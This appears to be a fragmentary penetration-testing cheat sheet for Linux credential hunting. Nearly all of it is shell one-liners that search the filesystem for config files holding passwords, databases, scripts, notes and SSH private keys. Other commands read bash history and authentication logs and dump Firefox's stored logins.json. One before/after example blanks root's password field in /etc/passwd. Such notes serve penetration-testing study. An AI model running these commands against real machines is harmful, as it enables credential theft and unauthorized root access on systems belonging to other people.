# Search for config files
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done
# Search for Credentials in config files
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done
# Search for Databases
for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done
# Search for Notes
find /home/* -type f -name "*.txt" -o ! -name "*.*"
# Search for Scripts
for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done
# Search for SSH Keys
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
# Search for History Files
tail -n5 /home/*/.bash*
# Search for Logs
for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\n#### Log file: " $i; grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null;fi;done
Stored Firefox Credentials
# Find File
ls -l .mozilla/firefox/ | grep default
# Show Encrypted Credential
cat .mozilla/firefox/<-->.default-release/logins.json | jq .
# Before
root:x:0:0:root:/root:/bin/bash
# After
root::0:0:root:/root:/bin/bash
exploiting credentials on Linux machines when there is an integration with Active Directory.